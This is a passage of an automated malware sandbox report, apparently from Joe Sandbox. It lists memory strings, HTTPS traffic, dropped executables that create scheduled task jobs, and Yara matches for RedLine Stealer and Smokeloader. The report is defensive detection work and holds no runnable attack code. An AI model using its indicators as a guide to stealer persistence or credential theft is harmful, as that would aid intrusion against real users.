Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/Z
Source: firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.tsn.ca
Source: firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.tsn.caZ
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: bdb44f72d9.exe, 0000001B.00000002.3339214666.00000000066D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtu.c
Source: firefox.exe, 0000001E.00000003.3011652184.00000270E2344000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3033402856.00000270D62E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3083929588.00000270DCB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3078302717.00000270DC74B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3103512040.00000270E3DCD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3080838293.00000270DC87E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3011652184.00000270E2344000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3103512040.00000270E3DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2998160641.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3105314081.00000270E4003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Z
Source: firefox.exe, 0000001E.00000002.3100681543.00000270E234C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3011652184.00000270E2344000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3047918500.00000270D8B94000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2999210432.00000270E4118000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3096588402.00000270E2065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2957174991.00000270CC674000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3083929588.00000270DCB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031269537.00000270C9B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958156579.00000270CC674000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958769374.00000270CC674000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3069164464.00000270DB11C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3105314081.00000270E4003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958487375.00000270CC674000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D614F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3263744904.00000277E8E30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 0000001D.00000002.2958630660.0000014A6E160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account--attempting-deelevation
Source: bdb44f72d9.exe, 0000001B.00000002.3336626547.0000000006678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account3
Source: firefox.exe, 0000001C.00000002.2952270255.00000158A7AC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3030803173.00000270C9930000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountC:
Source: firefox.exe, 0000001E.00000002.3030702011.00000270C98E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountH
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountMIN_STATUS_ANIMATION_DURATION_createNoSyncedTabsElement
Source: firefox.exe, 0000001E.00000002.3034852957.00000270D6947000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3034852957.00000270D6800000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031858393.00000270CC685000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3263744904.00000277E8E30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: bdb44f72d9.exe, 0000001B.00000002.3336626547.0000000006678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountV
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account_adoptBrowserFromOtherWindow
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account_shouldViewDownloadInternallygetCombined/overrideFnArray
Source: bdb44f72d9.exe, 0000001B.00000002.3286301463.000000000211A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounte
Source: bdb44f72d9.exe, 0000001B.00000002.3336626547.0000000006678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounti
Source: firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3030250199.000001124EA00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.comZ
Source: firefox.exe, 0000001E.00000003.2999210432.00000270E4120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008852300.00000270E4120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 0000001E.00000002.3071808582.00000270DB751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3019285727.00000270DC81C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3030250199.000001124EA00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3047918500.00000270D8B83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3081525186.00000270DC99B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001E.00000002.3081525186.00000270DC9C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49803 version: TLS 1.2
Source: bdb44f72d9.exe, 00000017.00000002.3285543354.0000000002243000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: GetRawInputDataU?DJ memstr_ac73c3c2-6
Source: Yara match File source: Process Memory Space: bdb44f72d9.exe PID: 8148, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bdb44f72d9.exe PID: 3852, type: MEMORYSTR

System Summary

Source: 00000014.00000002.2765064487.000000000251D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000018.00000002.2900160849.00000000040C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000018.00000002.2899758965.00000000025D2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2382041122.000000000248D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2382402163.00000000040B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000014.00000002.2765545970.00000000040B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000022.00000002.3056076605.00000000025B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000022.00000002.3056668030.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: bdb44f72d9.exe, 00000017.00000002.3241866502.0000000000372000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b3a6889b-0
Source: bdb44f72d9.exe, 00000017.00000002.3241866502.0000000000372000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_5699a61b-7
Source: bdb44f72d9.exe, 0000001B.00000002.3241111543.0000000000372000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_9e8ceaa3-b
Source: bdb44f72d9.exe, 0000001B.00000002.3241111543.0000000000372000.00000040.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_f0b13f88-9
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name:
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name: .idata
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name:
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name:
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name: .idata
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: .idata
Source: explorti.exe.5.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name: .idata
Source: axplong.exe.8.dr Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C60B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C60B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C60B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C5AF280
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\userAKKKFBGDHJ.exe File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A35A0 0_2_6C5A35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B5440 0_2_6C5B5440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61545C 0_2_6C61545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61542B 0_2_6C61542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E5C10 0_2_6C5E5C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F2C10 0_2_6C5F2C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61AC00 0_2_6C61AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CD4D0 0_2_6C5CD4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B64C0 0_2_6C5B64C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E6CF0 0_2_6C5E6CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AD4E0 0_2_6C5AD4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6034A0 0_2_6C6034A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60C4A0 0_2_6C60C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B6C80 0_2_6C5B6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CED10 0_2_6C5CED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D0512 0_2_6C5D0512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BFD00 0_2_6C5BFD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E0DD0 0_2_6C5E0DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6085F0 0_2_6C6085F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C616E63 0_2_6C616E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C9E50 0_2_6C5C9E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E3E50 0_2_6C5E3E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F2E4E 0_2_6C5F2E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C4640 0_2_6C5C4640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AC670 0_2_6C5AC670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E7E10 0_2_6C5E7E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C609E30 0_2_6C609E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F5600 0_2_6C5F5600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6176E3 0_2_6C6176E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5ABEF0 0_2_6C5ABEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BFEF0 0_2_6C5BFEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C604EA0 0_2_6C604EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C5E90 0_2_6C5C5E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60E680 0_2_6C60E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E7710 0_2_6C5E7710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B9F00 0_2_6C5B9F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D6FF0 0_2_6C5D6FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5ADFE0 0_2_6C5ADFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F77A0 0_2_6C5F77A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C8850 0_2_6C5C8850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CD850 0_2_6C5CD850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EF070 0_2_6C5EF070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B7810 0_2_6C5B7810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EB820 0_2_6C5EB820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F4820 0_2_6C5F4820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6150C7 0_2_6C6150C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CC0E0 0_2_6C5CC0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E58E0 0_2_6C5E58E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D60A0 0_2_6C5D60A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61B170 0_2_6C61B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CA940 0_2_6C5CA940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FB970 0_2_6C5FB970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BD960 0_2_6C5BD960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E5190 0_2_6C5E5190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DD9B0 0_2_6C5DD9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C602990 0_2_6C602990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AC9A0 0_2_6C5AC9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E9A60 0_2_6C5E9A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E8AC0 0_2_6C5E8AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C1AF0 0_2_6C5C1AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EE2F0 0_2_6C5EE2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C612AB0 0_2_6C612AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BCAB0 0_2_6C5BCAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61BA90 0_2_6C61BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A22A0 0_2_6C5A22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D4AA0 0_2_6C5D4AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A5340 0_2_6C5A5340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BC370 0_2_6C5BC370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5ED320 0_2_6C5ED320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6153C8 0_2_6C6153C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AF380 0_2_6C5AF380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65AC60 0_2_6C65AC60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C72AC30 0_2_6C72AC30
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5DCBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5E94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 2376
Source: file.exe, 00000000.00000000.1997247217.000000000244C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe, 00000000.00000002.2401890239.000000006C632000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2402174118.000000006C825000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000014.00000002.2765064487.000000000251D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000018.00000002.2900160849.00000000040C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000018.00000002.2899758965.00000000025D2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2382041122.000000000248D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
